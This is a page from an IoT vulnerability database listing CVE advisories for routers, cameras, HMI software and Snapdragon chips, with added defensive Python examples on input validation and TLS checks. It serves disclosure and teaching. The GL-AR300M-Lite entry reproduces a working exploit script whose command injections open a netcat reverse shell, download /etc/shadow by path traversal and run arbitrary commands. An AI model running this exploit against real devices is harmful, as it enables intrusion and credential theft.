VARIoT IoT vulnerabilities database
| VAR-201901-1326 | CVE-2018-5880 | snapdragon mobile and snapdragon wear Buffer error vulnerability |
CVSS V2: 7.2 CVSS V3: 7.8 Severity: HIGH |
Improper data length check while processing an event report indication can lead to a buffer overflow in snapdragon mobile and snapdragon wear in versions MDM9206, MDM9607, SD 210/SD 212/SD 205, SD 425, SD 427, SD 430, SD 435, SD 450, SD 625, SD 636, SD 835, SDA660, SDM630, SDM660. Snapdragon Mobile and Snapdragon Wear therefore contain a buffer error vulnerability; possible impact is information disclosure, tampering with information, and denial of service (DoS). Qualcomm MDM9206 and the other parts listed are Qualcomm processor products used across different platforms. A buffer error vulnerability exists in several Qualcomm Snapdragon products. No further details are currently available; watch CNNVD or the vendor's announcements.
| VAR-201901-1325 | CVE-2018-5879 | snapdragon mobile and snapdragon wear Buffer error vulnerability |
CVSS V2: 8.3 CVSS V3: 8.8 Severity: HIGH |
Improper length check while processing an MQTT message can lead to heap overflow in snapdragon mobile and snapdragon wear in versions MDM9206, MDM9607, SD 210/SD 212/SD 205, SD 425, SD 427, SD 430, SD 435, SD 450, SD 625, SD 636, SD 835, SDA660, SDM630, SDM660. Snapdragon Mobile and Snapdragon Wear therefore contain a buffer error vulnerability; possible impact is information disclosure, tampering with information, and denial of service (DoS). Qualcomm MDM9206 and the other parts listed are Qualcomm processor products used across different platforms. A buffer error vulnerability exists in several Qualcomm Snapdragon products. No further details are currently available; watch CNNVD or the vendor's announcements.
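The advisory names the bug class ("improper length check while processing an MQTT message") but gives no code. The Python parser below is an added example, not Qualcomm's implementation: it parses an MQTT 3.1.1 PUBLISH packet and compares every declared length (the variable-length Remaining Length field, the topic length, the packet identifier) with the bytes actually received before anything is used. In a C receiver, copying topic_len bytes out of a heap buffer that holds fewer is exactly the heap overflow described; a Python slice would merely truncate, so this parser rejects such packets explicitly. The packets are constructed for the example.

```python
import struct


class MalformedPacket(ValueError):
    """Raised for any packet whose declared lengths disagree with the bytes present."""


def decode_remaining_length(buf, offset):
    """Decode the MQTT variable-length 'Remaining Length' field at buf[offset:].

    Returns (value, offset_after_field). Each byte carries 7 bits plus a
    continuation bit; the spec allows at most 4 bytes, so a fifth continuation
    byte, or running off the end of the buffer, is an error rather than a read
    past the end.
    """
    value, multiplier = 0, 1
    for i in range(4):
        if offset + i >= len(buf):
            raise MalformedPacket('truncated remaining-length field')
        byte = buf[offset + i]
        value += (byte & 0x7F) * multiplier
        if not byte & 0x80:
            return value, offset + i + 1
        multiplier *= 128
    raise MalformedPacket('remaining-length field longer than 4 bytes')


def parse_publish(buf):
    """Parse an MQTT 3.1.1 PUBLISH packet, checking every length against the data present."""
    buf = bytes(buf)
    if len(buf) < 2:
        raise MalformedPacket('too short for a fixed header')
    if buf[0] >> 4 != 3:
        raise MalformedPacket('not a PUBLISH packet (type %d)' % (buf[0] >> 4))
    qos = (buf[0] >> 1) & 0x03
    if qos == 3:
        raise MalformedPacket('reserved QoS value 3')

    remaining, pos = decode_remaining_length(buf, 1)
    if pos + remaining > len(buf):
        # The missing check: trusting 'remaining' here is what lets a short
        # packet drive reads and copies past the end of the receive buffer.
        raise MalformedPacket('remaining length %d but only %d bytes follow'
                              % (remaining, len(buf) - pos))
    body = buf[pos:pos + remaining]

    if len(body) < 2:
        raise MalformedPacket('missing topic length')
    topic_len = struct.unpack('>H', body[:2])[0]
    if 2 + topic_len > len(body):
        # A C implementation doing memcpy(topic, body + 2, topic_len) into a
        # buffer sized from the packet overflows here; we refuse instead.
        raise MalformedPacket('topic length %d exceeds %d body bytes'
                              % (topic_len, len(body) - 2))
    try:
        topic = body[2:2 + topic_len].decode('utf-8')   # the spec requires valid UTF-8
    except UnicodeDecodeError as e:
        raise MalformedPacket('topic is not valid UTF-8') from e
    cursor = 2 + topic_len

    packet_id = None
    if qos > 0:
        if cursor + 2 > len(body):
            raise MalformedPacket('QoS %d PUBLISH without packet identifier' % qos)
        packet_id = struct.unpack('>H', body[cursor:cursor + 2])[0]
        cursor += 2

    return {'topic': topic, 'qos': qos, 'packet_id': packet_id, 'payload': body[cursor:]}


def is_well_formed(buf):
    """True when parse_publish accepts the packet."""
    try:
        parse_publish(buf)
    except MalformedPacket:
        return False
    return True


def build_publish(topic, payload, qos=0, packet_id=None):
    """Encode a well-formed PUBLISH; used here to construct example input."""
    encoded_topic = topic.encode('utf-8')
    body = struct.pack('>H', len(encoded_topic)) + encoded_topic
    if qos:
        body += struct.pack('>H', packet_id)
    body += payload
    encoded_len, n = b'', len(body)
    while True:
        digit, n = n % 128, n // 128
        encoded_len += bytes([digit | 0x80 if n else digit])
        if not n:
            break
    return bytes([0x30 | (qos << 1)]) + encoded_len + body


# Constructed sample: the header correctly promises 5 body bytes, but the topic
# length field claims 65535 bytes while only 3 follow.
TRUNCATED_TOPIC = bytes([0x30, 0x05, 0xFF, 0xFF, 0x61, 0x62, 0x63])
```

The same discipline applies to every string field in CONNECT, SUBSCRIBE and the other control packets: the length prefix is attacker-controlled data and must be bounded by what was actually received, never the other way round.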
| VAR-201901-0076 | CVE-2019-6487 | TP-Link WDR series device firmware command injection vulnerability |
CVSS V2: 6.5 CVSS V3: 8.8 Severity: HIGH |
TP-Link WDR Series devices through firmware v3 (such as TL-WDR5620 V3.0) are affected by command injection (after login) leading to remote code execution, because shell metacharacters can be included in the weather get_weather_observe citycode field. TP-Link WDR Series device firmware therefore contains a command injection vulnerability; possible impact is information disclosure, tampering with information, and denial of service (DoS). The TP-Link WDR Series is a line of wireless routers from TP-LINK (China). A remote attacker who can log in to the device could exploit the vulnerability to execute code.
| VAR-201901-0464 | CVE-2018-15784 | Dell Networking OS10 certificate validation vulnerability |
CVSS V2: 5.8 CVSS V3: 7.4 Severity: HIGH |
Dell Networking OS10 versions prior to 10.4.3.0 contain a vulnerability in the Phone Home feature which does not properly validate the server's certificate authority during TLS handshake. Use of an invalid or malicious certificate could potentially allow an attacker to spoof a trusted entity by using a man-in-the-middle (MITM) attack. Dell Networking OS10 therefore contains a certificate validation vulnerability; possible impact is information disclosure and tampering with information. Dell Networking OS10 is a Linux-based network switch operating system developed by Dell.
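The advisory states the failure mode (the server's certificate authority is not validated during the TLS handshake) but no code. The Python below is an added illustration, not Dell's Phone Home implementation: a client TLS context with that weak behaviour next to the corrected one, and a small audit function that flags what a reviewer looks for in any outbound TLS client such as a phone-home agent. The cafile path, the host name and the port are assumptions.

```python
import socket
import ssl


def phone_home_context_insecure():
    """The behaviour the advisory describes: TLS is spoken, but the peer's
    certificate chain is never checked, so a MITM holding any certificate
    completes the handshake. Added illustration, not the vendor's code."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False          # must be cleared before verify_mode can be lowered
    ctx.verify_mode = ssl.CERT_NONE     # no chain validation at all
    return ctx


def phone_home_context(cafile=None):
    """Corrected client context: chain verified against a trust store, name
    checked against the certificate, nothing below TLS 1.2.

    cafile is an assumed path to the CA bundle the appliance should trust
    (ideally only the CA that issued the phone-home server's certificate);
    None falls back to the system trust store."""
    ctx = ssl.create_default_context(cafile=cafile)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    ctx.check_hostname = True
    ctx.verify_mode = ssl.CERT_REQUIRED
    return ctx


def audit_client_context(ctx):
    """Findings a reviewer would raise for an outbound TLS client context."""
    findings = []
    if ctx.verify_mode != ssl.CERT_REQUIRED:
        findings.append('peer certificate not verified')
    if not ctx.check_hostname:
        findings.append('hostname not matched against certificate')
    if ctx.minimum_version < ssl.TLSVersion.TLSv1_2:
        findings.append('TLS versions below 1.2 accepted')
    return findings


def open_phone_home(host, port=443, ctx=None, timeout=10):
    """Connect with the hardened context. server_hostname both sets SNI and is
    the name verified against the certificate; a forged or mis-issued chain
    raises ssl.SSLCertVerificationError inside wrap_socket, before any data."""
    ctx = ctx or phone_home_context()
    sock = socket.create_connection((host, port), timeout=timeout)
    return ctx.wrap_socket(sock, server_hostname=host)
```

With the corrected context a MITM must present a certificate that chains to a CA in cafile and carries the expected name; pinning cafile to the single issuing CA rather than the whole system store narrows that trust further.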
| VAR-201901-0851 | CVE-2018-19013 | Omron CX-Supervisor Command injection vulnerability |
CVSS V2: 6.6 CVSS V3: 7.3 Severity: High |
An attacker could inject commands to delete files and/or delete the contents of a file on CX-Supervisor (Versions 3.42 and prior) through a specially crafted project file. CX-Supervisor, provided by OMRON Corporation, contains the following multiple vulnerabilities:
* Code injection (CWE-94) - CVE-2018-19011: by processing a specially crafted project file, arbitrary code can be executed with application privileges.
* Use after free (CWE-416) - CVE-2018-19017: by processing a specially crafted project file, arbitrary code can be executed with application privileges.
* Access of resource using incompatible type, i.e. type confusion (CWE-843) - CVE-2018-19019: by processing a specially crafted project file, arbitrary code can be executed with application privileges.
* Access of uninitialized pointer (CWE-824) - CVE-2018-19018: by processing a specially crafted project file, arbitrary code can be executed with application privileges.
* Out-of-bounds read (CWE-125) - CVE-2018-19020: by processing a specially crafted project file, the application reads values outside an array.
Impact: a third party could cause a denial of service (DoS) or execute arbitrary code with application privileges. This vulnerability allows remote attackers to delete arbitrary files on vulnerable installations of OMRON CX-Supervisor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of project files. The issue results from the lack of proper validation of a user-supplied string, which could allow the deletion of any file on the system. An attacker could use this to delete data or create a denial-of-service condition. Omron CX-Supervisor is a machine visualization package that provides a flexible PC-based HMI environment.
Omron CX-Supervisor is prone to the following security vulnerabilities:
1. A code-injection vulnerability
2. Multiple command-injection vulnerabilities
3.
Omron CX-Supervisor 3.42 and prior versions are vulnerable. Omron CX-Supervisor is machine visualization (HMI) software from Omron Corporation of Japan. A command injection vulnerability exists in Omron CX-Supervisor 3.42 and earlier versions.
| VAR-201901-0853 | CVE-2018-19015 | OMRON CX-Supervisor multiple vulnerabilities |
CVSS V2: 6.6 CVSS V3: 7.8 Severity: HIGH |
An attacker could inject commands to launch programs and create, write, and read files on CX-Supervisor (Versions 3.42 and prior) through a specially crafted project file. An attacker could exploit this to execute code under the privileges of the application. CX-Supervisor, provided by OMRON Corporation, contains the following multiple vulnerabilities:
* Code injection (CWE-94) - CVE-2018-19011: by processing a specially crafted project file, arbitrary code can be executed with application privileges.
* Use after free (CWE-416) - CVE-2018-19017: by processing a specially crafted project file, arbitrary code can be executed with application privileges.
* Access of resource using incompatible type, i.e. type confusion (CWE-843) - CVE-2018-19019: by processing a specially crafted project file, arbitrary code can be executed with application privileges.
* Access of uninitialized pointer (CWE-824) - CVE-2018-19018: by processing a specially crafted project file, arbitrary code can be executed with application privileges.
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of OMRON CX-Supervisor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of project files. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. Omron CX-Supervisor is a machine visualization package that provides a flexible PC-based HMI environment.
Omron CX-Supervisor is prone to the following security vulnerabilities:
1. A code-injection vulnerability
2. Multiple command-injection vulnerabilities
3.
Omron CX-Supervisor 3.42 and prior versions are vulnerable. Omron CX-Supervisor is machine visualization (HMI) software from Omron Corporation of Japan. A command injection vulnerability exists in Omron CX-Supervisor 3.42 and earlier versions.
| VAR-201901-0855 | CVE-2018-19019 | Omron CX-Supervisor Type Confusion Vulnerability |
CVSS V2: 6.6 CVSS V3: 7.3 Severity: High |
A type confusion vulnerability exists when processing project files in CX-Supervisor (Versions 3.42 and prior). An attacker could use a specially crafted project file to exploit and execute code under the privileges of the application. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of OMRON CX-Supervisor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of SCS files. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. Omron CX-Supervisor is a machine visualization package that provides a flexible PC-based HMI environment.
Omron CX-Supervisor is prone to the following security vulnerabilities:
1. A code-injection vulnerability
2. Multiple command-injection vulnerabilities
3.
Omron CX-Supervisor 3.42 and prior versions are vulnerable. Omron CX-Supervisor is machine visualization (HMI) software from Omron Corporation of Japan.
| VAR-201901-0854 | CVE-2018-19017 | OMRON CX-Supervisor SCS File Parsing Use-After-Free Remote Code Execution Vulnerability |
CVSS V2: 6.6 CVSS V3: 7.8 Severity: HIGH |
Several use after free vulnerabilities have been identified in CX-Supervisor (Versions 3.42 and prior). When processing project files, the application fails to check if it is referencing freed memory. An attacker could use a specially crafted project file to exploit and execute code under the privileges of the application. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of OMRON CX-Supervisor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of project files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. Omron CX-Supervisor is a machine visualization package that provides a flexible PC-based HMI environment. Successful exploitation lets an attacker execute code with the application's privileges.
Omron CX-Supervisor is prone to the following security vulnerabilities:
1. A code-injection vulnerability
2. Multiple command-injection vulnerabilities
3.
Omron CX-Supervisor is machine visualization (HMI) software from Omron Corporation of Japan.
| VAR-201903-1180 | CVE-2018-18881 | ControlByWeb X-320M-I security feature vulnerability |
CVSS V2: 6.8 CVSS V3: 6.5 Severity: MEDIUM |
A Denial of Service (DOS) issue was discovered in ControlByWeb X-320M-I Web-Enabled Instrumentation-Grade Data Acquisition module 1.05 with firmware revision v1.05. An authenticated user can configure invalid network settings, stopping TCP based communications to the device. A physical factory reset is required to restore the device to an operational state. ControlByWeb X-320M-I therefore contains a vulnerability related to security features; possible impact is denial of service (DoS). ControlByWeb X-320M is prone to a cross-site scripting vulnerability and an authentication-bypass vulnerability.
Attackers can exploit these issues to execute arbitrary script code in the context of the browser, obtain sensitive information, or cause a denial-of-service condition; other attacks may also be possible.
X-320M-I firmware revision v1.05 and prior are vulnerable. ControlByWeb X-320M is a network-enabled weather station controller from Xytronix Research & Design, USA. The product supports remote viewing of the current wind speed, wind direction, precipitation, temperature, humidity, solar radiation, air pressure and similar readings. A security feature issue exists in the Xytronix Research & Design ControlByWeb X-320M; an attacker could exploit it to cause a denial of service.
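The DoS above is an input-validation failure on the device's own network settings: once a bad address, mask or gateway is committed, the device is gone from the network until someone walks to it. The Python below is an added example, not the X-320M firmware, of the validation a setup page should apply before anything is written, plus the stage/confirm pattern that makes a mistake recoverable without a factory reset. The field names and the example addresses are assumptions.

```python
import ipaddress


class InvalidNetworkConfig(ValueError):
    """Raised for settings that would leave the device unreachable over IP."""


def validate_network_settings(ip, netmask, gateway, dns=()):
    """Validate a static IPv4 configuration before it is written to the device.

    Returns the parsed ipaddress.IPv4Interface. The checks are the ones a web
    setup page should make before committing: parseable values, a contiguous
    mask, a usable host address, and a gateway that is actually on the link.
    """
    try:
        addr = ipaddress.IPv4Address(ip)
    except ValueError as e:
        raise InvalidNetworkConfig('IP address %r: %s' % (ip, e)) from e
    try:
        iface = ipaddress.IPv4Interface('%s/%s' % (addr, netmask))  # rejects non-contiguous masks
    except ValueError as e:
        raise InvalidNetworkConfig('netmask %r: %s' % (netmask, e)) from e
    net = iface.network
    if net.prefixlen == 0 or net.prefixlen > 30:
        raise InvalidNetworkConfig('netmask %s leaves no usable subnet' % netmask)
    if addr.is_multicast or addr.is_loopback or addr.is_unspecified:
        raise InvalidNetworkConfig('%s is not a unicast host address' % addr)
    if addr in (net.network_address, net.broadcast_address):
        raise InvalidNetworkConfig('%s is the network or broadcast address of %s' % (addr, net))
    try:
        gw = ipaddress.IPv4Address(gateway)
    except ValueError as e:
        raise InvalidNetworkConfig('gateway %r: %s' % (gateway, e)) from e
    if gw not in net or gw in (addr, net.network_address, net.broadcast_address):
        raise InvalidNetworkConfig('gateway %s is not another host on %s' % (gw, net))
    for server in dns:
        try:
            ipaddress.IPv4Address(server)
        except ValueError as e:
            raise InvalidNetworkConfig('DNS server %r: %s' % (server, e)) from e
    return iface


def is_valid_network_settings(**settings):
    """Boolean form of validate_network_settings."""
    try:
        validate_network_settings(**settings)
    except InvalidNetworkConfig:
        return False
    return True


class NetworkSettings:
    """Two-phase commit: a staged configuration only replaces the running one
    after an explicit confirm (sent over the new address), so a change that
    cuts the operator off is undone by revert(), for instance from a watchdog
    that fires when no confirm arrives, instead of by a factory reset."""

    def __init__(self, running):
        validate_network_settings(**running)
        self.running = dict(running)
        self.staged = None

    def stage(self, new):
        validate_network_settings(**new)   # reject outright-invalid input first
        self.staged = dict(new)
        return self.staged

    def confirm(self):
        if self.staged is None:
            raise RuntimeError('nothing staged')
        self.running, self.staged = self.staged, None
        return self.running

    def revert(self):
        self.staged = None
        return self.running
```

Validation alone cannot catch a setting that is syntactically fine but wrong for the site (a gateway that exists on paper but not on that link), which is why the confirm step is kept separate from the checks.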
| VAR-201903-1181 | CVE-2018-18882 | ControlByWeb X-320M-I cross-site scripting vulnerability |
CVSS V2: 3.5 CVSS V3: 5.4 Severity: MEDIUM |
A stored cross-site scripting (XSS) issue was discovered in ControlByWeb X-320M-I Web-Enabled Instrumentation-Grade Data Acquisition module 1.05 with firmware revision v1.05. An authenticated user can inject arbitrary script via setup.html in the web interface. ControlByWeb X-320M-I therefore contains a cross-site scripting vulnerability; possible impact is information disclosure and tampering with information. ControlByWeb X-320M is prone to a cross-site scripting vulnerability and an authentication-bypass vulnerability.
Attackers can exploit these issues to execute arbitrary script code in the context of the browser, obtain sensitive information, or cause a denial-of-service condition; other attacks may also be possible.
X-320M-I firmware revision v1.05 and prior are vulnerable. ControlByWeb X-320M is a network-enabled weather station controller from Xytronix Research & Design, USA. The product supports remote viewing of the current wind speed, wind direction, precipitation, temperature, humidity, solar radiation, air pressure and similar readings. A cross-site scripting vulnerability exists in the Xytronix Research & Design ControlByWeb X-320M because the program does not validate input properly. A remote attacker could exploit it to execute script in the context of a victim's browser.
| VAR-201902-0642 | CVE-2018-19008 | ABB CP400PB TextEditor Input validation vulnerability |
CVSS V2: 6.8 CVSS V3: 7.8 Severity: HIGH |
The TextEditor 2.0 in ABB CP400 Panel Builder versions 2.0.7.05 and earlier contains a vulnerability in the file parser of the Text Editor wherein the application doesn't properly prevent the insertion of specially crafted files which could allow arbitrary code execution. ABB CP400 Panel Builder therefore contains an input validation vulnerability; possible impact is information disclosure, tampering with information, and denial of service (DoS). ABB CP400 Panel Builder (CP400PB) is HMI programming software from ABB (Switzerland); TextEditor is its text editor component. An attacker could exploit the vulnerability to execute arbitrary code or cause a denial of service. ABB CP400 Panel Builder TextEditor is prone to a local code-execution vulnerability. Failed exploit attempts may cause a denial-of-service condition.
The following products are vulnerable:
CP400 Panel Builder TextEditor 2.0
CP400PB 2.0.7.05 and prior
| VAR-201901-1690 | No CVE | Reolink camera has multiple vulnerabilities |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Shenzhen Ruilian Digital Technology Co., Ltd. (Reolink) develops Internet video products and video content services: cameras for security, sports, entertainment, care and other consumer segments, and services such as live streaming, video sharing and cloud video storage. Reolink cameras have a remote command execution vulnerability and two stack overflow vulnerabilities reachable without authorization. An attacker could combine the remote command execution vulnerability with the default credentials (user admin with an empty password) or weak passwords to bypass authentication and remotely take over the camera.
| VAR-201901-1689 | No CVE | D-Link Central WifiManager Co***.php page SQL injection vulnerability |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
D-Link Central WifiManager (CWM-100) is D-Link's centralized wireless management software.
The Co***.php page of D-Link Central WifiManager has a SQL injection vulnerability. An attacker can use it to obtain database information and to modify or delete arbitrary data in the database.
| VAR-201901-1697 | No CVE | Command execution vulnerability in D-link Central WifiManager |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
D-Link Central WifiManager (CWM-100) is D-Link's centralized wireless management software.
D-Link Central WifiManager contains a command execution vulnerability in its implementation. An attacker could use it to gain control of the web server.
| VAR-201901-1698 | No CVE | D-Link Central WifiManager Ra***.php page SQL injection vulnerability |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
D-Link Central WifiManager is D-Link's centralized wireless management software.
The Ra***.php page of D-Link Central WifiManager has a SQL injection vulnerability. An attacker can use it to obtain sensitive database information.
| VAR-201906-0356 | CVE-2019-5216 | Multiple Huawei smartphones race condition vulnerability |
CVSS V2: 7.6 CVSS V3: 7.0 Severity: HIGH |
There is a race condition vulnerability on Huawei Honor V10 smartphones versions earlier than Berkeley-AL20 9.0.0.156(C00E156R2P14T8), Honor 10 smartphones versions earlier than Columbia-AL10B 9.0.0.156(C00E156R1P20T8) and Honor Play smartphones versions earlier than Cornell-AL00A 9.0.0.156(C00E156R1P13T8). An attacker tricks the user into installing a malicious application, which makes multiple processes operate on the same variable at the same time. Successful exploit could cause execution of malicious code. The Huawei Honor V10, Honor 10 and Honor Play are smartphone products of Huawei (China).
| VAR-201903-0427 | CVE-2019-6441 | Multiple Shenzhen Coship devices credentials management vulnerability |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
An issue was discovered on Shenzhen Coship RT3050 4.0.0.40, RT3052 4.0.0.48, RT7620 10.0.0.49, WM3300 5.0.0.54, and WM3300 5.0.0.55 devices. The password reset functionality of the router doesn't have backend validation for the current password and doesn't require any type of authentication. By making a POST request to the apply.cgi file of the router, the attacker can change the admin username and password of the router. These Shenzhen Coship devices therefore contain a credentials management vulnerability; possible impact is information disclosure, tampering with information, and denial of service (DoS). The Coship Wireless Router is a wireless router produced by Coship Electronics (China). An attacker could use this vulnerability to reset the administrator password. The following versions are affected: Coship Wireless Router 4.0.0.40, 4.0.0.48, 5.0.0.54, 5.0.0.55 and 10.0.0.49.
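The two missing controls above, no authentication on the reset endpoint and no check of the current password, are worth seeing next to their fixed form. The Python below is an added example, not Coship's apply.cgi: an in-memory credential store, a handler that behaves as the advisory describes, and a hardened handler that requires a live session, re-checks the current password in constant time, applies a minimal policy to the new one and revokes every session afterwards. The form field names (new_user, new_pass, cur_pass) and the token-based session are assumptions.

```python
import hashlib
import hmac
import os
import secrets

PBKDF2_ITERATIONS = 100_000


class AdminCredentials:
    """Stored admin login plus the set of live session tokens (in memory for the example)."""

    def __init__(self, username, password):
        self.username = username
        self.sessions = set()
        self.salt = b''
        self.digest = b''
        self.replace(username, password)

    @staticmethod
    def _hash(password, salt):
        return hashlib.pbkdf2_hmac('sha256', password.encode('utf-8'), salt, PBKDF2_ITERATIONS)

    def check_password(self, candidate):
        # constant-time comparison so the check does not leak how many bytes matched
        return hmac.compare_digest(self._hash(candidate, self.salt), self.digest)

    def login(self, username, password):
        """Return a session token on success, None otherwise."""
        if username == self.username and self.check_password(password):
            token = secrets.token_hex(16)
            self.sessions.add(token)
            return token
        return None

    def replace(self, username, password):
        """Store a new username and a freshly salted password hash."""
        self.username = username
        self.salt = os.urandom(16)
        self.digest = self._hash(password, self.salt)


def apply_cgi_vulnerable(creds, form, session=None):
    """The behaviour the advisory describes: the reset path neither requires a
    session nor re-checks the current password, so an unauthenticated POST wins."""
    creds.replace(form['new_user'], form['new_pass'])
    return 'ok'


def apply_cgi_fixed(creds, form, session=None):
    """Credential change done properly: valid session, current password
    re-entered, a minimal policy on the new password, every session revoked."""
    if session not in creds.sessions:
        return 'error: not authenticated'
    if not creds.check_password(form.get('cur_pass', '')):
        return 'error: current password incorrect'
    new_pass = form.get('new_pass', '')
    if len(new_pass) < 8:
        return 'error: new password too short'
    creds.replace(form.get('new_user', creds.username), new_pass)
    creds.sessions.clear()   # any attacker session dies with the old credentials
    return 'ok'
```

Requiring the current password on the reset path is what defeats the CSRF and session-theft variants of the same attack: a stolen cookie alone is no longer enough to lock the administrator out.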
| VAR-201901-0849 | CVE-2018-19011 | Omron CX-Supervisor Code injection vulnerability |
CVSS V2: 6.6 CVSS V3: 7.3 Severity: High |
CX-Supervisor (Versions 3.42 and prior) can execute code that has been injected into a project file. An attacker could exploit this to execute code under the privileges of the application. CX-Supervisor, provided by OMRON Corporation, contains the following multiple vulnerabilities:
* Code injection (CWE-94) - CVE-2018-19011: by processing a specially crafted project file, arbitrary code can be executed with application privileges.
* Command injection (CWE-77) - CVE-2018-19013: by processing a specially crafted project file, files on the device and their contents are deleted.
* Command injection (CWE-77) - CVE-2018-19015: by processing a specially crafted project file, a program is executed with the authority of the application, and a file on the device is created, written and read.
* Use after free (CWE-416) - CVE-2018-19017: by processing a specially crafted project file, arbitrary code can be executed with application privileges.
* Access of resource using incompatible type, i.e. type confusion (CWE-843) - CVE-2018-19019: by processing a specially crafted project file, arbitrary code can be executed with application privileges.
* Access of uninitialized pointer (CWE-824) - CVE-2018-19018: by processing a specially crafted project file, arbitrary code can be executed with application privileges.
* Out-of-bounds read (CWE-125) - CVE-2018-19020: by processing a specially crafted project file, the application reads values outside an array.
Impact: a third party could cause a denial of service (DoS) or execute arbitrary code with application privileges. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of OMRON CX-Supervisor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of project files. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. Omron CX-Supervisor is a machine visualization package that provides a flexible PC-based HMI environment.
Omron CX-Supervisor is prone to the following security vulnerabilities:
1. A code-injection vulnerability
2. Multiple command-injection vulnerabilities
3.
Omron CX-Supervisor 3.42 and prior versions are vulnerable. Omron CX-Supervisor is machine visualization (HMI) software from Omron Corporation of Japan.
| VAR-201903-0450 | CVE-2019-6272 | GL-AR300M-Lite Command Injection Vulnerability |
CVSS V2: 6.5 CVSS V3: 8.8 Severity: HIGH |
Command injection vulnerability in login_cgi in GL.iNet GL-AR300M-Lite devices with firmware 2.27 allows remote attackers to execute arbitrary code. The GL.iNet GL-AR300M-Lite device firmware therefore contains a command injection vulnerability; possible impact is information disclosure, tampering with information, and denial of service (DoS). The GL-AR300M-Lite is a smart wireless router.
A command injection vulnerability exists in GL-AR300M-Lite firmware version 2.27. No further details are currently available; watch CNNVD or the vendor's announcements. The published proof of concept follows.
# Exploit Title: GL-AR300M-Lite Authenticated Command injection - Arbitrary file download - Directory Traversal
# Date: 15/1/2019
# Exploit Author: Pasquale Turi aka boombyte
# Vendor Homepage: https://www.gl-inet.com/
# Software Link: https://www.gl-inet.com/products/gl-ar300m/
# Version: Firmware version 2.27
# CVE : CVE-2019-6272 - CVE-2019-6273 - CVE-2019-6274 - CVE-2019-6275

import requests

rhost = 'RHOST'        # router address
lhost = 'LHOST'        # listener for the reverse shell (CVE-2019-6272)
lport = 'LPORT'
password = 'PASSWORD'  # web UI admin password: all four issues are post-authentication


def login(rhost, password):
    # Fetch the login page, then checklogin, whose body carries the CSRF token the UI
    # expects in X-CSRF-TOKEN; the token is sliced out of the response at fixed offsets
    r = requests.get('http://' + rhost + '/login.html')
    r2 = requests.get('http://' + rhost + '/cgi-bin/login_cgi?action=checklogin', cookies=r.cookies)
    header = {'X-CSRF-TOKEN': r2.text[13:45]}
    r3 = requests.post('http://' + rhost + '/cgi-bin/login_cgi', headers=header, cookies=r2.cookies,
                       data={'action': 'login', 'password': password, 'code': ''})
    # the login response carries the session cookies and a fresh token for the next request
    return r3.cookies, {'X-CSRF-TOKEN': r3.text[31:63]}


# CVE-2019-6272 PoC (command injection): the timezone value reaches a shell, so the
# backtick expression runs and connects a shell back to lhost:lport
cookies, header = login(rhost, password)
requests.post('http://' + rhost + '/cgi-bin/login_cgi', headers=header, cookies=cookies,
              data={'action': 'settimezone', 'timezone': '`nc ' + lhost + ' ' + lport + ' -e /bin/ash`'})

# CVE-2019-6273 PoC (arbitrary file download): /mnt/.. steps out of the directory
# download_file is meant to serve from
file_path = '/etc/shadow'
cookies, header = login(rhost, password)
r4 = requests.get('http://' + rhost + '/cgi-bin/download_file?/mnt/..' + file_path, headers=header, cookies=cookies)
print(r4.text)

# CVE-2019-6274 PoC (path traversal): storage_cgi lists whatever directory pwd names
path = '/'
cookies, header = login(rhost, password)
r4 = requests.get('http://' + rhost + '/cgi-bin/storage_cgi?id=2&pwd=' + path, headers=header, cookies=cookies)
print(r4.text)

# CVE-2019-6275 PoC (second command injection): update_time decodes to
#   04:00|echo qydre8t159 1||a #' |echo  `id`||a #|" |echo a 1||a #
# a payload that runs `id` whether the value lands unquoted, single-quoted or double-quoted
cookies, header = login(rhost, password)
r4 = requests.post('http://' + rhost + '/cgi-bin/firmware_cgi?action=setautoupdate&auto_update=off&update_time=04%3a00%7cecho%20qydre8t159%201%7c%7ca%20%23\'%20%7cecho%20%20%60id%60%7c%7ca%20%23%7c%22%20%7cecho%20a%201%7c%7ca%20%23&_=1547223055153 ', headers=header, cookies=cookies)
print(r4.text)
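The TP-Link entry above (shell metacharacters in the citycode field) and the GL.iNet proof of concept just shown (backticks in timezone, pipes and quotes in update_time) are the same bug: a web parameter spliced into a string that a shell later parses. The Python below is an added illustration, not TP-Link's or GL.iNet's firmware code: it assumes the vulnerable shape is a single command string handed to /bin/sh, shows how a shell would tokenize an injected value, and gives the fixed form (allow-list the value, then pass argv with no shell). The wget command, the weather.example host and the numeric city-code rule are assumptions.

```python
import re
import shlex
import subprocess

# Characters that let a value escape its argument once the string reaches /bin/sh.
SHELL_META = re.compile(r"[;&|`$(){}<>\n\\'\"]")

CITYCODE_RE = re.compile(r'[0-9]{1,12}')   # assumption: weather city codes are numeric


def shell_words(command):
    """Tokenize the way a POSIX shell would, keeping ; | & as their own tokens,
    so we can see which words the shell would treat as separate commands."""
    lex = shlex.shlex(command, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    return list(lex)


def injected_commands(command):
    """Command words that follow a control operator: empty for a benign value."""
    words = shell_words(command)
    operators = {';', '|', '||', '&', '&&'}
    return [words[i + 1] for i, w in enumerate(words[:-1]) if w in operators]


def weather_command_vulnerable(citycode):
    """Assumed shape of the affected pattern: the field is spliced into one
    string that is later handed to a shell. Built here, never executed."""
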